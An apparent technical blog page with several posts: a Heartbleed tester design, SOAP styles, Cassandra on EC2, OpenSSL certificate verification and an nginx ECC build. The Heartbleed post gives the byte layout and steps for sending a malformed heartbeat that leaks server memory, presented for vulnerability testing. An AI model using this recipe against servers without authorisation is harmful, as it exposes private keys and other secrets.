OpenSSL Heartbeat vulnerability – Heartbleed and Java, BouncyCastle, How to write a program to check

To write a program to validate if a particular web server that runs on a version susceptible to “heartbleed”, one could use the plethora of free tests on the web such as the ones linked from the Wikipedia link on the subject. I am the author of the heartbleed test for Symantec SSL at: ““.  Note: the codebase in that is completely different and follows a completely different approach to what I am going to release to the general public: a sample code that demonstrates heartbeat requests with BouncyCastle.

However, if the server that is to be verified is not accessible from the outside, you would need to write your own or download one. There are quite a few of python, Go and even one that details the changes to be made to OpenSSL s_client and use them to discover the vulnerability. Some of them work, some some of the time and when they do not, one need to understand why.

The following sections would briefly explain the OpenSSL vulnerability and the fix and how to write one of your own.

The vulnerability

An improper  heartbeat (HB) request would lead to a vulnerable web server leaking the content in its memory. This content could be a secret key or its password and so on.

While testing my HB tester program, noticed that there were attacks on my external facing web server at a rate of 2 every 10 minutes. There are a lot of attacks going on at this time.

The HB request

The request is in the following format:

HB request => ContentType (1 byte) : TLS Version (2 bytes: major and minor) : Record Size (2 bytes) : Encrypted or not Encrypted bytes

An example in hex: 18 0303 00cc and then the encrypted or not encrypted HB message follows.


Encrypted or not Encrypted bytes => HB message Type : Payload Size : Payload : Padding

An example in hex for a non encrypted HB request message: 1 00cf and the actual payload and padding follow.

An improper HB request

An improper or attack vector request would create a payload of size less than what it specifies in the “Payload”. As simple as that.

An improper HB request to a vulnerable OpenSSL installation would result in it returning a HB response. The same request to a patched / not vulnerable OpenSSL (or any other web server that is not susceptible to HB) would result in a TLS alert.

The vulnerability in a little more detail

The malformed message results in an affected OpenSSL version returning a payload of the same size that is specified in the HB request irrespective of the real payload in the request. The affected OpenSSL version does not validate this aspect and the response payload is read from the memory going way beyond and leaking memory contents.

 The patch

The patch is a test of the payload length specified in the request and the actual payload size.

if (1 + 2 + payload + 16 > s->s3->rrec.length) return 0;
/* silently discard per RFC 6520 sec. 4 */

If the 1 byte that specifies the size of the HB record type (request in this case) plus the 2 bytes of that specify the payload length plus the size of the payload that is specified plus the minimum size of the padding (that is 16 bytes) is GREATER than the record length then no HB response is to be returned.

Design of a program to test for this vulnerability using Java

  1. Create a Java Socket to the web server
  2. Get a sample of a TLS ClientHello from TCPDUMP (Use s_client to send in a HB request and capture the packets to get the sample) (Make sure that it has the Heartbeat Extension setup to allow for heartbeats).
  3. Write the TLS ClientHello bytes to the socket
  4. Read the ServerHello response bytes till the end
  5. Sent in the malformed HB request (construct it in the way that is described above)
  6. Check the response: if it not an TLS alert then the web server is vulnerable. The server could reset the connection or timeout and we can assume – in these cases – that the server is not vulnerable. However there is a infinitesimal chance of a false negative especially in case of a connection timeout (and consequently the server certified to be not vulnerable) then the connection time out could be due to an actual connection issue! Note that to circumvent the heartbleed issue, network adminstrators have deployed firewall rules that would time out a heartbeat request – valid or not.

There are a huge number of types of web servers out there. The above steps would in all probability work in properly diagnosing this vulnerability in Apache and Nginx on Linux but would fail with IBM HTTP Web Server or IIS. In such a scenario, one would parse the complete ServerHello and check whether it is an extended ServerHello and if it is would check for the existence of the heartbeat extension.

Also note, that the SSL version 3.0 RFC does not allow an extended ClientHello or a ServerHello so the suggestion is to use a TLS 1.0 ClientHello in this case.

The other alternate approach would be to use BouncyCastle and send in heartbeat requests after the TLS session has been established: check out TLSProtocolHandler. If I have time, I would post that piece of code for your perusal. However as of now, I have experimented with BouncyCastle and have been successful in:

  • Establishing a TLS session
  • Sending in an encrypted “valid” TLS heartbeat request and received an encrypted heartbeat response.
  • Sending in an encrypted “invalid” TLS heartbeart request and received an encrypted heartbeat response if the server is vulnerable to heartbleed. Else, we receive an Alert, connection reset or a socket read timeout that points to a patched or a server unaffected by heartbleed.

NB: It seems to me that a valid heartbeat request is only allowed by OpenSSL after a TLS session has been established. I have tested (and you can test either with s_client or your own tool perhaps using BouncyCastle) sending a valid heartbeat request after establishing a TLS session. I established a valid TLS session and sent in an encrypted heartbeat and was able to elicit a heartbeat response using java and bouncycastle. I have not cleaned out the code and once I do will post it. So empirically, it seems that even in OpenSSL versions that are broken, a valid heartbeat request right after ServerHelloDone is disallowed. That would be the reason that a heartbeat response is not forthcoming for a valid heartbeat request send before the TLS handshake is complete.

Happy testing.




Posted in Technical | Leave a comment

White Paper on RSA versus ECC Certificate Performance Analysis in SSL / TLS

The white paper that I was the lead on that led to a award at Symantec is available to the public and you can get it here.

Not only does it explicate the empirical performance of SSL / TLS with these two types of certificates but it also provides an in depth overview of the protocol.

Posted in Technical | Leave a comment

SOAP and JAX-WS, RPC versus Document Web Services

JAX-WS and RPC versus Document Web Services

I have had this buried on this web site for years and am publishing it on the blog as well.

This article will take a journey that ends with a clear and cogent elucidation of the differences between the various styles of SOAP styles for web services. The styles covered are RPC Literal versus Document Literal versus Document Wrapped. We also talk about WS-I Basic Profile that web services need to be compliant of in order to achieve interoperability with consumers on a different platform, technology stack etc.

The article assumes familiarity with XML, WSDL, SOAP as well as Java (upwards of Java 5 including annotations). You can run any of the examples with JDK 1.6 without downloading any extensions or any other libraries.

With the advent of JDK 1.6, JAX-WS and JAXB support is intrinsically available without the need to download any new libraries since Metro is part of the JDK release now.

Without digressing, lets come down to the differences between RPC and Document styles with respect to the java codebase, the WSDL and the SOAP requests and responses. For the purpose of this illustration, we would create an example with a java interface that would be annotated with JAX-WS annotations to translate it into a web service and then generate the artifacts and detail the WSDL and the SOAP requests and responses so generated.

Note: the coverage extends to styles that are mandated by the WS-I BP 1.1 (Basic Profile for interoperability of web services).

We will use the Bottoms-Up approach where in the java interface would be coded first and then the WSDL would be generated off it.

There would be java classes used for the purpose of illustrating the differences and the WSDL and Schema as well as the SOAP requests and responses would also be displayed for demonstrating the differences between the following SOAP styles:

  1. RPC Literal (Wrapped)
  2. Document Literal
  3. Document Wrapped

The following java classes are used. They are listed in entirety (except the package or import statements for the purpose of brevity) and any differences introduced for different SOAP styles are highlighted in the relevant sections.

  1. MyServiceIF => this is the web service interface
  2. MyServiceImpl => this is the implementation of the MyServiceIF.
  3. HolderClass1 => this is singular argument in the exposed web service operation
    • HolderClass2 => this is one of the instance variables of the HolderClass1 besides a string and an integer.
  4. EndPointPublisher => as the name suggests, this publishes the web service and automatically generates the artifacts such as the WSDL.

Once the java codebase, WSDL, Schema, SOAP Request and Response are outlined for each of the SOAP styles, thereafter a section explaining the various differences is provided.

RPC Literal Wrapped

RPC-Literal is always wrapped (not BARE).  This is a listing of the java classes mentioned earlier.

Java Listing





Listing 1: The Java codebase.

WSDL and Schema

The WSDL generated for RPC Literal is as follows:


The schema that this WSDL refers to is:


SOAP Request

RPC-Lit SOAP Request

SOAP Response


RPC-Lit SOAP Response


Document Literal (BARE)

The java codebase remains the same except for the following:

  1. The SOAP Binding for the MyServiceIF is updated to specify Document as the style:@SOAPBinding(style=Style.DOCUMENT, use=Use.LITERAL, parameterStyle=ParameterStyle.BARE)
  2. The WebParam annotation now specifies a partName as well. This is to elucidate where the partName would be translated to in the WSDL that would be created.
  3. Since WS-I BP 1.1 specifies that there should be only one child in the body of the element. Since this is a Document Literal service, there would not be an element (such as the name of the operation) that encapsulates all the parameters (such as class1 and intArg). This implies that such a case would not be WS-I BP 1.1 compliant. Therefore JAX WS will not allow it and as a result spew out this error:
    Exception in thread “main” runtime modeler error: SEI server.MyServiceImpl has method getHolderClass annotated as BARE but it has more than one parameter bound to body. This is invalid. Please annotate the method with annotation: @SOAPBinding(parameterStyle=SOAPBinding.ParameterStyle.WRAPPED)
    To overcome this issue and to continue to demonstrate this style, we would remove one of the arguments in the method.

Java Listing


@SOAPBinding(style=Style.DOCUMENT, use=Use.LITERAL, parameterStyle=ParameterStyle.BARE)

publicinterface MyServiceIF {


HolderClass1 getHolderClass(@WebParam( name=“holderClass1Param”, partName=“holderClass1Param2″) HolderClass1 class1);



WSDL and Schema

The WSDL so generated for this style is:

Doc Literal WSDL

And the schema that is refers to is:

Doc Literal Sche,a

SOAP Request

<soapenv:Envelope xmlns:soapenv=”” xmlns:ser=”http://server/”>













SOAP Response

<S:Envelope xmlns:S=””>


<ns2:getHolderResponse xmlns:ns2=”http://server/”>










Document Literal Wrapped

The java codebase remains the same except for the following:

  1. The SOAP Binding for the MyServiceIF is updated to specify Wrapped as the parameter style. The parameterStyle attribute in the SOAPBinding annotation is removed and that implies the service is wrapped due to “Wrapped” being the default for the attribute.@SOAPBinding(style=Style.DOCUMENT, use=Use.LITERAL)

Java Listing


WSDL and Schema

The WSDL so generated for this style is:

Doc Wrapped WSDL

And the schema that is refers to is:

Doc  Wrapped Schema

SOAP Request

Doc Wrapped SOAP Request

SOAP Response

Doc Wrapped SOAP Response

Differences between the Styles

RPC Literal (Wrapped) Document Literal Document Wrapped
Request Message The operation name appears immediately after the soap:body. The operation name is specified by the binding:operation element in the binding section of the WSDL.
The name attribute of the message:part follows immediately. It is not qualified by a namespace
Thereafter the names of the elements in the types section of the WSDL are specified.
The operation name is not specified in the request.
The value specified by the element attribute of message:part is the first line following the soap:body. It is qualified by a namespace. Note that this value of the element attribute is actually the value of the name attribute of the schema element in the types section.
Thereafter it is similar to RPC Literal in the way that the names of the elements in the types section of the WSDL are specified.
It is similar to “Document Literal Bare” style with one exception => the value of the “element” attribute in the message:part is defined to be the name of the operation. Therefore the name of the operation is part of the request.
The operation name appears immediately after the soap:body.
Thereafter it is similar to RPC Literal.
WS-I BP 1.1 Compliance It is WS-I BP 1.1 compliant even though there are many parts in the input message. This is because the first element after the soap:body is the name of the operation and that encapsulates it all. Since it can have multiple parts immediately following the soap:body, it is not WS-I BP 1.1 compliant. Therefore to make it compliant, a wrapper needs to be defined and this implies that the web method can only have one argument. You could circumvent this requirement by defining the arguments to be part of the SOAP header instead of the body. It is WS-I BP 1.1 compliant.
WSDL There could be many parts in the input message.
The parts are always specified with a “type” attribute.
There could be many parts in the input message
The parts are always specified with an “element” attribute
There is only one part in the input message.
The part is always specified by an “element” attribute.
This part is the entire message payload and is completely defined in the types section.


Posted in Technical | Leave a comment

Cassandra version 1.2 and Amazon EC2 MultiRegion replication and RandomPartitioner

This post will explicate the configuration and deployment of Cassandra v1.2 cluster across 2 Amazon EC2 regions – one EC2 instance  in Oregon and the other in Virginia. Note that the instances are in a cluster that spans across multiple Amazon regions.  The “cassandra-stress” utility (bundled in with Cassandra) will be used to test the insertion of 1M records of 2KB each in one region and subsequently read in the other region.

Configuration of a 2 node cluster – one node in each region

One can extend the cluster into as many nodes as required based on the steps outlined herein to create a 2 node cluster. Please note that these steps are a enabler for creating a multi-region cluster of ‘X’ set of nodes where ‘X’ is, of course, greater than 2. :-) You would not want to have a 2 node cluster – much less 2 nodes spread across 2 regions.

  1. Download and unzip / untar the cassandra 1.2 binary.
  2. cd conf and open up cassandra.yaml for editing:

    cluster_name: 'GK Cluster' [Update the cluster name]
    num_tokens: [Keep this commented]
    initial_token: 0 [set this to 0 for the first node]
    partitioner: RandomPartitioner [Replace the default with this]
    data_file_directories: /fs/fs1/cassandra/data [See below for details]
    commitlog_directory: /fs/fs2/cassandra/commitlog [See below for details]
    saved_caches_directory: /fs/fs2/cassandra/saved_caches [See below for details]
    seeds: "X.X.X.X,Y.Y.Y.Y" [comma separate public IPs of EC2 instances - one for each region]
    listen_address: pri.pri.pri.pri [Private IP of this instance]
    broadcast_address: [Public IP of this instance]
    rpc_address: [Replace with this]
    endpoint_snitch: Ec2MultiRegionSnitch [Replace with this snitch]

    The data_file and commit_log directories should be on two different disks. If you are using the new hi1.4xlarge instance to host Cassandra nodes then there are 2 TBs of local SSD storage. These 2 volumes need to be formatted (to ext4) and mounted. Thereafter one of these could be used for a commit log and the other for a data files. The initial_token is to be calculated using the  “tools/bin/token-generator” tool. In our case, we have one node in each region. Please note that if we had multiple nodes in each region then each region should be partitioned if it was its own distinct ring.
  3. Repeat the preceding configuration step on the other node in the other region.
  4. Start up both the nodes.
  5. Check the status of the ring on node tool:
    $ bin/nodetool ring
    Datacenter: us-east
    Replicas: 0
    Address         Rack        Status State   Load            Owns                Token                                       
    X.X.X.X         1a          Up     Normal  71.18 KB        50.00%              0                                           
    Datacenter: us-west-2
    Replicas: 0
    Address         Rack        Status State   Load            Owns                Token                                       
    Y.Y.Y.Y         2a          Up     Normal  43.18 KB        50.00%              169417178424467235000914166253263322299

This concludes the setup of the cluster spread across two Amazon regions.

Replication across regions

To demonstrate the replication of data from one region to the other, we would need to define a KeySpace with a RF (Replication Factor) of 2. Thus, there would be 2 replicas for each column family in it – one in each region.

We can utilize the “cassandra-stress” utility that is configurable to create KeySpaces, specify snitches, create a test payload of a given size and so on. The following two steps delineate the usage and demonstrates replication across regions.

Step 1:

In one node, we would run “cassandra-stress” to write to the cluster.

$ tools/bin/cassandra-stress -S 2048 -c 1 -e ONE  -n 1000000 -r -R NetworkTopologyStrategy --strategy-properties='us-east:1,us-west-2:1' -i 3
Created keyspaces. Sleeping 1s for propagation.

Here we write a million rows of size 2048 bytes with a consistency level of “ONE”. We also specify that the KeySpace that is to be created (if the KeySpace that cassandra-stress utilizes does not exist then it creates it) should have replication across regions – “us-east:1″ and “us-west-2:1″.  The one million rows are created in 59 seconds.

To check the number of keys inserted, run the following:

$ bin/nodetool cfstats | more
 Column Family: Standard1
                SSTable count: 2
                Space used (live): 2017340163
                Space used (total): 2017452629
                Number of Keys (estimate): 951424

The number of keys are close to one million – please note that this is an estimate.

Step 2:

At the other node, we read from the cluster.

$ tools/bin/cassandra-stress -o read -n 1000000

We see that one million keys are read in 50 seconds.

To check the number of keys on this node:

$ bin/nodetool cfstats | more
 Column Family: Standard1
                SSTable count: 2
                Space used (live): 2041994209
                Space used (total): 2042106846
                Number of Keys (estimate): 963072

Status of the ring post the write and read operations:

$ bin/nodetool ring
Note: Ownership information does not include topology; for complete information, specify a keyspace

Datacenter: us-east
Address         Rack        Status State   Load            Owns                Token                                       

X.X.X.X         1a          Up     Normal  1.88 GB         50.00%              0                                           

Datacenter: us-west-2
Address         Rack        Status State   Load            Owns                Token                                       

Y.Y.Y.Y         2a          Up     Normal  1.9 GB          50.00%              169417178424467235000914166253263322299
Posted in Technical | Tagged | 3 Comments

OpenSSL verify a certificate chain (chain verification and validation) using the “verify” command

In addition to the verification of the chain through the “s_client” command demonstrated earlier in the series, one can also use the “ verify” command to the same. It is easier in the case when the certificate chain is not already installed on a web server (in that case we can use the verify option with the “s_client” command) or it is a chain for the client certificates.

In the following example, we have an end-entity client certificate (PEM encoded) in 1.pem and the intermediate certificate in 2.pem. The root self-signed CA certificate is in 3.pem. We are verifying the end-entity certificate (1.pem) with the intermediate CA certificate (2.pem).

$ openssl verify -verbose -purpose sslclient -CAfile 2.pem 1.pem
1.pem: C = US, CN = XXX, O = YYY
error 20 at 0 depth lookup:unable to get local issuer certificate

To delve deeper for the failure, we need to add the “issuer_checks” option to display all the checks that are taking place. And we notice that the intermediate certificate does not have the “Certificate Signing” (KeyCertSign) bit set so the verification fails. We need to ask for a intermediate CA certificate with the right key usage bits. Please see “keyCertSign” in RFC 5280.

$ openssl verify -verbose -issuer_checks -purpose sslclient -CAfile 2.pem 1.pem
1.pem: C = US, CN = XXX, O = YYY
error 29 at 0 depth lookup:subject issuer mismatch
error 32 at 0 depth lookup:key usage does not include certificate signing
error 20 at 0 depth lookup:unable to get local issuer certificate


Posted in Technical | Tagged , , , | Leave a comment

X509 certificate and keyUsage

The keyUsage as delineated in RFC 5280 specifies the the purpose of the key (public key) contained in the certificate.

For instance:

  1. “keyEncipherment” implies that the public key is used to encrypt private or secret keys.
  2. “digitalSignature” implies that the public key can be used to validate the digital signatures.
  3. “keyAgreement” implies that the public key is used for key agreement as in the DH case. The key agreement algorithm could be ECDH (Elliptic Curve DH) where the public key of the end-entity certificate is a ECDH public key. The certificate could be signed by any normal CA – for example with it’s  ECDSA or RSA private keys. So in the case of a ECC certificate or any certificate containing an ECC public key, one would find the same ECC public key being utilized for key agreement as in  the ECDH (not ECDHE) case. Note that ECDHE does not require this keyUsage bit to be set. 

For the other bits in the keyUsage extension, please see the RFC.


Posted in Technical | Tagged | Leave a comment

What is the encoding of the SSL certificates on the wire and how is the certificate chain configured?

It is DER and it follows the RFC for TLS v1.2. Opened up WireShark and exported the raw bytes for one of the certificates among the chain transmitted by the server in the SSL / TLS “Certificate” message and decoded it and validated the DER encoding. This was on an HTTPS connection to an Apache Web Server.

The other question that web server administrators and writers of server certificate verification code would need to know is what should be the order of the certificates in the certificate chain that is being sent back by the web server. The RFC provides details on that as well wherein the sender’s certificate must come in first followed by the certificate that would certify it and so on.

Posted in Technical | Tagged | Leave a comment

Nginx 1.2.x and install Elliptic Curve Crytpography (ECC) support – installation on Linux (.configure options and build for SSL / TLS support and enable HTTPS)

As of writing this and as far as I know, the pre-compiled binaries for nginx for various platforms (RedHat / CentOS or another linux variant) do not come with ECC support so you would not be able to utilize ECC based certificates (ECDHE key exchange or ECDSA  authentication). The solution is to compile the Nginx source code with an OpenSSL version that has ECC support such as OpenSSL 1.0.1c or 1.0.1e. As of writing, 1.0.1c has a vulnerability (please see the OpenSSL web site for more details) and 1.0.1e is the recommended version.

When comparing with Apache HTTPD web server compilation, I found building Nginx to be simpler based on the fact that one needs to specify the OpenSSL source and Nginx build process takes care of building and linking to it.

After downloading Nginx source, run the following to check the options for configure:

./configure --help

This will list out all options that determine what modules to enable or disable, locations of dependencies such as OpenSSL if they are not in the obvious locations.

Since we have downloaded the OpenSSL source (1.0.1x) to support ECC into a different folder, we need to specify that so the configure option becomes:

./configure --prefix=/app/installs/nginx --with-http_ssl_module --with-openssl=/app/source/openssl/openssl-1.0.1c

This implies that nginx will be installed at “/app/installs/nginx” with the module to add SSL / TLS support and the location of the OpenSSL source is specified as well (this is where the OpenSSL source was extracted).

Thereafter run the following commands:


Switch to root if not already so and

make install

Uncomment the HTTPS / SSL sections from the Nginx configuration file and specify the certificates and you are all set.

To check the options for the nginx command line:

nginx --help

To start nginx:


If you get errors about PCRE at the configure stage or later (error messages replicated below) and if you have previously installed it, update the LD_LIBRARY_PATH environment variable to include the library but if you do not have it installed, there is a section on this blog on installing PCRE. All one has to do is to download the source and simply install that. Another approach is to install the PCRE development libraries. Both approaches are outlined below.

Error Message 1 (at configure time):

./configure: error: the HTTP rewrite module requires the PCRE library.
You can either disable the module by using --without-http_rewrite_module
option, or install the PCRE library into the system, or build the PCRE library
statically from the source with nginx by using --with-pcre= option.

Error Message 2 (later at run time):

nginx: error while loading shared libraries: cannot open shared object file: No such file or directory

Solution 1:

While configuring nginx, one can specify the location of the source of PCRE source (8.3.1 is the version that I used and can be downloaded from the PCRE website) at the configure step:

./configure ..... ..... ... --with-pcre=/app/source/pcre/pcre-8.31

And repeat the “make, make install” steps as outlined earlier.

Solution 2:

Alternatively if PCRE is already installed then simply point to it (you would need the development libraries):

$ yum search pcre
Matched: pcre ==
opensips-regex.x86_64 : RegExp via PCRE library
pcre.i386 : Perl-compatible regular expression library
pcre.x86_64 : Perl-compatible regular expression library
pcre-devel.i386 : Development files for pcre
pcre-devel.x86_64 : Development files for pcre

Then install the development version:

$ yum install pcre-devel

Time to reconfigure and install Nginx:

$ ./configure ...... [same arguments as above]

A successful “./configure” would have something akin to this output:

$ ./configure .........
checking for OS
+ Linux 2.6.18-128.1.6.el5 x86_64
checking for C compiler ... found
+ using GNU C compiler
+ gcc version: 4.1.2 20080704 (Red Hat 4.1.2-44)
checking for gcc -pipe switch ... found
checking for gcc builtin atomic operations ... found
checking for C99 variadic macros ... found
checking for gcc variadic macros ... found
checking for unistd.h ... found
checking for inttypes.h ... found
checking for limits.h ... found
checking for sys/filio.h ... not found
checking for sys/param.h ... found
checking for sys/mount.h ... found
checking for sys/statvfs.h ... found
checking for crypt.h ... found
checking for Linux specific features
checking for epoll ... found
checking for sendfile() ... found
checking for sendfile64() ... found
checking for sys/prctl.h ... found
checking for prctl(PR_SET_DUMPABLE) ... found
checking for sched_setaffinity() ... found
checking for crypt_r() ... found
checking for sys/vfs.h ... found
checking for nobody group ... found
checking for poll() ... found
checking for /dev/poll ... not found
checking for kqueue ... not found
checking for crypt() ... not found
checking for crypt() in libcrypt ... found
checking for F_READAHEAD ... not found
checking for posix_fadvise() ... found
checking for O_DIRECT ... found
checking for F_NOCACHE ... not found
checking for directio() ... not found
checking for statfs() ... found
checking for statvfs() ... found
checking for dlopen() ... not found
checking for dlopen() in libdl ... found
checking for sched_yield() ... found
checking for SO_SETFIB ... not found
checking for SO_ACCEPTFILTER ... not found
checking for TCP_DEFER_ACCEPT ... found
checking for TCP_INFO ... not found
checking for accept4() ... not found
checking for int size ... 4 bytes
checking for long size ... 8 bytes
checking for long long size ... 8 bytes
checking for void * size ... 8 bytes
checking for uint64_t ... found
checking for sig_atomic_t ... found
checking for sig_atomic_t size ... 4 bytes
checking for socklen_t ... found
checking for in_addr_t ... found
checking for in_port_t ... found
checking for rlim_t ... found
checking for uintptr_t ... uintptr_t found
checking for system byte ordering ... little endian
checking for size_t size ... 8 bytes
checking for off_t size ... 8 bytes
checking for time_t size ... 8 bytes
checking for setproctitle() ... not found
checking for pread() ... found
checking for pwrite() ... found
checking for sys_nerr ... found
checking for localtime_r() ... found
checking for posix_memalign() ... found
checking for memalign() ... found
checking for mmap(MAP_ANON|MAP_SHARED) ... found
checking for mmap("/dev/zero", MAP_SHARED) ... found
checking for System V shared memory ... found
checking for POSIX semaphores ... not found
checking for POSIX semaphores in libpthread ... found
checking for struct msghdr.msg_control ... found
checking for ioctl(FIONBIO) ... found
checking for struct tm.tm_gmtoff ... found
checking for struct dirent.d_namlen ... not found
checking for struct dirent.d_type ... found
checking for sysconf(_SC_NPROCESSORS_ONLN) ... found
checking for openat(), fstatat() ... found
checking for getaddrinfo() ... found
checking for PCRE library ... found
checking for PCRE JIT support ... not found
checking for OpenSSL library ... found
checking for zlib library ... found
creating objs/Makefile

Configuration summary
+ using system PCRE library
+ using system OpenSSL library [or the source location]
+ md5: using OpenSSL library
+ sha1: using OpenSSL library
+ using system zlib library

nginx path prefix: “/app/…..”
nginx binary file: “/app/….”
nginx configuration prefix: “/app/…..”
nginx configuration file: “/app/…..”
nginx pid file: “/app/…/”
nginx error log file: “/app/…./logs/error.log”
nginx http access log file: “/app/…../logs/access.log”
nginx http client request body temporary files: “client_body_temp”
nginx http proxy temporary files: “proxy_temp”
nginx http fastcgi temporary files: “fastcgi_temp”
nginx http uwsgi temporary files: “uwsgi_temp”
nginx http scgi temporary files: “scgi_temp”

And then proceed with the make and make install.

Posted in Technical | Tagged | Leave a comment

JMeter (Java) and DNS and SSL and CRL and OCSP

While utilizing JMeter for some load testing of a web service on HTTPS, wanted to confirm the external invocations being made by the program for OCSP and CRL etc. The easiest way is to utilize the “strace” command to display the network system calls:

strace -f -s 1024 -e trace=network ./

[pid  7361] connect(86, {sa_family=AF_INET6, sin6_port=htons(443), inet_pton(AF_INET6, “::ffff:10.0.0.xx, &sin6_addr), sin6_flowinfo=0, sin6_scope_id=0}, 28) = 0
[pid  7361] getsockname(86, {sa_family=AF_INET6, sin6_port=htons(35606), inet_pton(AF_INET6, “::ffff:10.0.0.xx”, &sin6_addr), sin6_flowinfo=0, sin6_scope_id=0}, [28]) = 0
[pid  7361] connect(87, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr(“10.0.0.xx”)}, 16) = 0
[pid  7361] sendto(87, “\226q\1\0\0\1\0\0\0\0\0\0\00274\0010\0010\00210\7in-addr\4arpa\0\0\f\0\1″, 40, MSG_NOSIGNAL, NULL, 0) = 40
So the snippet above determines that there is a DNS call to port 53 of the name server (in bold above).
There are no OCSP calls being made as well. By default all of that is disabled. To allow for OCSP calls and CRL checking, one needs to set the appropriate system properties. Please see:

A snippet to enable OCSP and CRL is:
// params is an instance of PKIXParameters
Security.setProperty("ocsp.enable", "true");
// for CRL
System.setProperty("", "true");

Posted in Technical | Leave a comment

RFC 5077: TLS Session Resumption without Server-Side State

If you view the output of SSLDump and if there is evidence of SSL Session Resumption especially if there is “session cache” is not configured on the server then you might be perplexed. I was and after a little investigation was able to attribute it to the implementation of RFC 5077.

Essentially the client sends an empty SessionTicket extension to the server (in the ClientHello message) and the server responds with an empty one if it supports such resumption (in the ServerHello message). The server, later on, after the computation of the “MasterSecret” would encrypt it along with the other session state such as the cipher suite in a “SessionTicket” and return the “NewSessionTicket” message to the client right before the ChangeCipherSpec message.

The following is a screen shot of a “SessionTicket” message / packet from the server to the client captured on WireShark.

Posted in Technical | Leave a comment